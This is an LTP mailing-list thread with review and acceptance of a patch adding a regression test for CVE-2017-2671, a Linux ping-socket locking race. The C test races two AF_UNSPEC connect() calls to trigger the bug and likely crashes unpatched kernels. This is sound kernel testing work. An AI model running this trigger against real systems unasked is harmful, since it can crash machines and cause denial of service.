+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2017-2671 faulty locking on ping socket
+ *
+ * When sys_connect() is called with sockaddr.sin_family set to AF_UNSPEC on a
+ * ping socket; __udp_disconnect() gets called, which in turn calls the buggy
+ * function ping_unhashed(). This function does not obtain a rwlock before
+ * checking if the socket is hashed allowing the socket data to be pulled from
+ * underneath it in the time between calling sk_hashed() and gaining the write
+ * lock.
+ *
+ * Fixed in commit 43a6684519ab0a6c52024b5e25322476cabad893
+ *
+ * This test repeatedly 'connects' a ping socket correctly then calls
+ * connect() with AF_UNSPEC in two seperate threads to trigger the race
+ * condition. If the bug is present, then the test will most likely crash the
+ * system.
+ *
+ * The test requests root privileges so that it can ensure ping sockets are
+ * enabled. On distributions (including Android) where ping sockets are
+ * enabled by default, root privileges are not required.
+ */
+
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+
+#include "tst_test.h"
+#include "tst_safe_net.h"
+#include "tst_safe_pthread.h"
+
+#include "tst_fuzzy_sync.h"
+
+#define ATTEMPTS 0xFFFF
+#define PING_SYSCTL_PATH "/proc/sys/net/ipv4/ping_group_range"
+
+static int sockfd;
+static unsigned int ping_min_grp = 1, ping_max_grp;
+static struct tst_fzsync_pair fzsync_pair = TST_FZSYNC_PAIR_INIT;
+static struct sockaddr_in iaddr, uaddr;
+
+static void setup(void)
+{
+	iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+	uaddr = iaddr;
+	iaddr.sin_family = AF_INET;
+	uaddr.sin_family = AF_UNSPEC;
+	fzsync_pair.delay_inc = 1;
+
+	SAFE_FILE_SCANF(PING_SYSCTL_PATH, "%u %u",
+			&ping_min_grp, &ping_max_grp);
+	SAFE_FILE_PRINTF(PING_SYSCTL_PATH, "0 0");
+}
+
+static void cleanup(void)
+{
+	if (ping_min_grp | ping_max_grp)
+		SAFE_FILE_PRINTF(PING_SYSCTL_PATH, "%u %u",
+				 ping_min_grp, ping_max_grp);
+}
+
+static void *connect_b(void * param LTP_ATTRIBUTE_UNUSED)
+{
+	tst_fzsync_delay_b(&fzsync_pair);
+	connect(sockfd, (struct sockaddr *)&uaddr, sizeof(uaddr));
+	tst_fzsync_time_b(&fzsync_pair);
+
+	return 0;
+}
+
+static void run(void)
+{
+	pthread_t thrd;
+	int i;
+
+	sockfd = SAFE_SOCKET(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
+	tst_res(TINFO, "Created ping socket, attempting to race...");
+
+	for (i = 0; i < ATTEMPTS; i++) {
+		SAFE_CONNECT(sockfd,
+			     (struct sockaddr *)&iaddr, sizeof(iaddr));
+		SAFE_PTHREAD_CREATE(&thrd, 0, connect_b, 0);
+
+		tst_fzsync_delay_a(&fzsync_pair);
+		connect(sockfd, (struct sockaddr *)&uaddr, sizeof(uaddr));
+		tst_fzsync_time_a(&fzsync_pair);
+
+		SAFE_PTHREAD_JOIN(thrd, 0);
+		tst_fzsync_pair_update(i, &fzsync_pair);
+
+		if (!(i & 0x7FFF))
+			tst_fzsync_pair_info(&fzsync_pair);
+	}
+
+	tst_res(TPASS, "We didn't crash");
+}
+
+static struct tst_test test = {
+	.setup = setup,
+	.test_all = run,
+	.cleanup = cleanup,
+	.needs_root = 1,
+};
-- 
2.12.2

[LTP] [PATCH v3 9/9] Test for CVE-2017-2671 on ping sockets

[Cyril Hrubis]

Hi!
> +static void run(void)
> +{
> +	pthread_t thrd;
> +	int i;
> +
> +	sockfd = SAFE_SOCKET(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
> +	tst_res(TINFO, "Created ping socket, attempting to race...");
> +
> +	for (i = 0; i < ATTEMPTS; i++) {
> +		SAFE_CONNECT(sockfd,
> +			     (struct sockaddr *)&iaddr, sizeof(iaddr));
> +		SAFE_PTHREAD_CREATE(&thrd, 0, connect_b, 0);
> +
> +		tst_fzsync_delay_a(&fzsync_pair);
> +		connect(sockfd, (struct sockaddr *)&uaddr, sizeof(uaddr));
> +		tst_fzsync_time_a(&fzsync_pair);
> +
> +		SAFE_PTHREAD_JOIN(thrd, 0);
> +		tst_fzsync_pair_update(i, &fzsync_pair);
> +
> +		if (!(i & 0x7FFF))
> +			tst_fzsync_pair_info(&fzsync_pair);
> +	}
> +
> +	tst_res(TPASS, "We didn't crash");

Hmm, shouldn't we close the sockfd here?

Or even better cannot we create the socket in the test setup and destroy
it in the test cleanup. That way everything should work fine even with
the -i option.

> +}
> +
> +static struct tst_test test = {
> +	.setup = setup,
> +	.test_all = run,
> +	.cleanup = cleanup,
> +	.needs_root = 1,
> +};
> -- 
> 2.12.2
> 
> 
> -- 
> Mailing list info: https://lists.linux.it/listinfo/ltp

-- 
Cyril Hrubis
chrubis@suse.cz

[LTP] [PATCH v4] Test for CVE-2017-2671 on ping sockets

[Richard Palethorpe]

Signed-off-by: Richard Palethorpe <rpalethorpe@suse.com>
---

V4 - Move socket creation and destruction to setup and cleanup. Also fix Makefile.

 runtest/cve                   |   1 +
 testcases/cve/.gitignore      |   1 +
 testcases/cve/Makefile        |   3 ++
 testcases/cve/cve-2017-2671.c | 121 ++++++++++++++++++++++++++++++++++++++++++
 4 files changed, 126 insertions(+)
 create mode 100644 testcases/cve/cve-2017-2671.c

diff --git a/runtest/cve b/runtest/cve
index ee0614a9c..32a39cf80 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -4,5 +4,6 @@ cve-2014-0196 cve-2014-0196
 cve-2016-4997 cve-2016-4997
 cve-2016-5195 dirtyc0w
 cve-2016-7117 cve-2016-7117
+cve-2017-2671 cve-2017-2671
 cve-2017-5669 cve-2017-5669
 cve-2017-6951 cve-2017-6951
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index bdb73f33b..1577cf914 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -2,5 +2,6 @@ cve-2012-0957
 cve-2014-0196
 cve-2016-4997
 cve-2016-7117
+cve-2017-2671
 cve-2017-6951
 cve-2017-5669
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
index 31f19d871..04abc1f9c 100644
--- a/testcases/cve/Makefile
+++ b/testcases/cve/Makefile
@@ -25,4 +25,7 @@ cve-2016-7117:	LDLIBS += -lrt
 cve-2014-0196:  CFLAGS += -pthread
 cve-2014-0196:  LDLIBS += -lrt -lutil
 
+cve-2017-2671:	CFLAGS += -pthread
+cve-2017-2671:	LDLIBS += -lrt
+
 include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/cve/cve-2017-2671.c b/testcases/cve/cve-2017-2671.c
new file mode 100644
index 000000000..21485121d
--- /dev/null
+++ b/testcases/cve/cve-2017-2671.c
@@ -0,0 +1,121 @@
+/*
+ * Copyright (c) 2017 Richard Palethorpe <rpalethorpe@suse.com>
+ * Original POC by Daniel Jiang
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 2 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ */
+/*
+ * Test for CVE-2017-2671 faulty locking on ping socket
+ *
+ * When sys_connect() is called with sockaddr.sin_family set to AF_UNSPEC on a
+ * ping socket; __udp_disconnect() gets called, which in turn calls the buggy
+ * function ping_unhashed(). This function does not obtain a rwlock before
+ * checking if the socket is hashed allowing the socket data to be pulled from
+ * underneath it in the time between calling sk_hashed() and gaining the write
+ * lock.
+ *
+ * Fixed in commit 43a6684519ab0a6c52024b5e25322476cabad893
+ *
+ * This test repeatedly 'connects' a ping socket correctly then calls
+ * connect() with AF_UNSPEC in two seperate threads to trigger the race
+ * condition. If the bug is present, then the test will most likely crash the
+ * system.
+ *
+ * The test requests root privileges so that it can ensure ping sockets are
+ * enabled. On distributions (including Android) where ping sockets are
+ * enabled by default, root privileges are not required.
+ */
+
+#include <stdio.h>
+#include <sys/socket.h>
+#include <arpa/inet.h>
+#include <stdlib.h>
+
+#include "tst_test.h"
+#include "tst_safe_net.h"
+#include "tst_safe_pthread.h"
+
+#include "tst_fuzzy_sync.h"
+
+#define ATTEMPTS 0xFFFF
+#define PING_SYSCTL_PATH "/proc/sys/net/ipv4/ping_group_range"
+
+static int sockfd;
+static unsigned int ping_min_grp = 1, ping_max_grp;
+static struct tst_fzsync_pair fzsync_pair = TST_FZSYNC_PAIR_INIT;
+static struct sockaddr_in iaddr, uaddr;
+
+static void setup(void)
+{
+	iaddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+	uaddr = iaddr;
+	iaddr.sin_family = AF_INET;
+	uaddr.sin_family = AF_UNSPEC;
+	fzsync_pair.delay_inc = 1;
+
+	SAFE_FILE_SCANF(PING_SYSCTL_PATH, "%u %u",
+			&ping_min_grp, &ping_max_grp);
+	SAFE_FILE_PRINTF(PING_SYSCTL_PATH, "0 0");
+
+	sockfd = SAFE_SOCKET(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
+	tst_res(TINFO, "Created ping socket, attempting to race...");
+}
+
+static void cleanup(void)
+{
+	SAFE_CLOSE(sockfd);
+	if (ping_min_grp | ping_max_grp)
+		SAFE_FILE_PRINTF(PING_SYSCTL_PATH, "%u %u",
+				 ping_min_grp, ping_max_grp);
+}
+
+static void *connect_b(void * param LTP_ATTRIBUTE_UNUSED)
+{
+	tst_fzsync_delay_b(&fzsync_pair);
+	connect(sockfd, (struct sockaddr *)&uaddr, sizeof(uaddr));
+	tst_fzsync_time_b(&fzsync_pair);
+
+	return 0;
+}
+
+static void run(void)
+{
+	pthread_t thrd;
+	int i;
+
+	for (i = 0; i < ATTEMPTS; i++) {
+		SAFE_CONNECT(sockfd,
+			     (struct sockaddr *)&iaddr, sizeof(iaddr));
+		SAFE_PTHREAD_CREATE(&thrd, 0, connect_b, 0);
+
+		tst_fzsync_delay_a(&fzsync_pair);
+		connect(sockfd, (struct sockaddr *)&uaddr, sizeof(uaddr));
+		tst_fzsync_time_a(&fzsync_pair);
+
+		SAFE_PTHREAD_JOIN(thrd, 0);
+		tst_fzsync_pair_update(i, &fzsync_pair);
+
+		if (!(i & 0x7FFF))
+			tst_fzsync_pair_info(&fzsync_pair);
+	}
+
+	tst_res(TPASS, "We didn't crash");
+}
+
+static struct tst_test test = {
+	.setup = setup,
+	.test_all = run,
+	.cleanup = cleanup,
+	.needs_root = 1,
+};
-- 
2.13.2

[LTP] [PATCH v4] Test for CVE-2017-2671 on ping sockets

[Cyril Hrubis]

Hi!
Pushed, thanks.

-- 
Cyril Hrubis
chrubis@suse.cz